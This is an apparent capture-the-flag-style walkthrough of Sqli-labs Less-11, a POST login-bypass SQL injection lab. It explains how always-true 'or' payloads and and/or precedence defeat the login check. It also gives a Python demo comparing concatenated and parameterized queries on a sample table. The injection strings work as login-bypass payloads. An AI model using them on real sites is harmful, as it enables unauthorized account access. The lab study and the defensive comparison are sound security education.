Viewing the page source shows that the user name and password are submitted via POST.
Submit a single quotation mark in the input.
An error is returned; from it, the underlying SQL statement is presumably:
Select ... from ... where xxx='...' and yyy='123' limit 0,1
Use or to construct an always-true condition and log in directly.
This succeeds. Note that the user logged in here is the first user in the table.
To log in as a different user, change the filter criteria.
Logging in as the second user in the table:
If sensitive characters are filtered on the client side, that check can be bypassed by submitting the POST data directly with HackBar.
If the input is constructed like this, the login will fail, because and has higher precedence than or.
yyy='test' returns false, so the and operation is also false, and xxx='1' or false evaluates to false.
This means the query doesn't return any results.
Select ... where xxx='1' or '1'='1' and yyy='test' limit 0,1
Note that if yyy='test' returns true, this query does return a result and the login succeeds.
For example, suppose a user in the table has the password admin.
Then it is possible to log in successfully as that user.
Use this idea to construct the following injection.
It successfully bypasses the login.
Select ... where xxx='1' or '1'='1' or '1'='1' and yyy='test' limit 0,1
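An added example (not part of the original walkthrough) that replays the two queries above against a constructed in-memory SQLite table: it shows the and/or precedence effect in the string-concatenated query, and that a parameterized query treats the same inputs as plain data. The table, its rows and the function names are assumptions, and SQLite stands in for the lab's database.

```python
import sqlite3

# Inputs taken from the two queries shown above (user-name field).
ONE_OR = "1' or '1'='1"
TWO_OR = "1' or '1'='1' or '1'='1"

def make_db():
    # Constructed sample data; xxx/yyy are the page's placeholder column names.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, xxx TEXT, yyy TEXT)")
    db.executemany("INSERT INTO users (xxx, yyy) VALUES (?, ?)",
                   [("alice", "wonderland"), ("bob", "admin")])
    return db

def login_concat(db, user, password):
    # Vulnerable form: input is pasted into the SQL text, so its quotes become syntax.
    sql = ("SELECT xxx FROM users WHERE xxx='" + user +
           "' AND yyy='" + password + "' LIMIT 0,1")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_param(db, user, password):
    # Hardened form: placeholders bind the input as data, never as SQL syntax.
    row = db.execute("SELECT xxx FROM users WHERE xxx=? AND yyy=? LIMIT 0,1",
                     (user, password)).fetchone()
    return row[0] if row else None

def demo():
    db = make_db()
    return {
        # AND binds tighter than OR: xxx='1' OR ('1'='1' AND yyy='test') -> no row.
        "one_or": (login_concat(db, ONE_OR, "test"), login_param(db, ONE_OR, "test")),
        # Same input, but the password matches a row: that row is returned.
        "one_or_pw_admin": (login_concat(db, ONE_OR, "admin"),
                            login_param(db, ONE_OR, "admin")),
        # Second OR makes the WHERE clause true for every row: first row returned.
        "two_or": (login_concat(db, TWO_OR, "test"), login_param(db, TWO_OR, "test")),
        # A genuine login still works through the parameterized query.
        "legit": (login_concat(db, "bob", "admin"), login_param(db, "bob", "admin")),
    }

if __name__ == "__main__":
    for case, (concat, param) in demo().items():
        print(f"{case:16} concatenated={concat!r:8} parameterized={param!r}")
```

Each result pair is (concatenated query, parameterized query); the parameterized column is empty for every crafted input and only returns a user for the genuine credentials.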
"Sqli-labs" Less11 post-error based-single quotes-string (Error-based POST single quote character injection)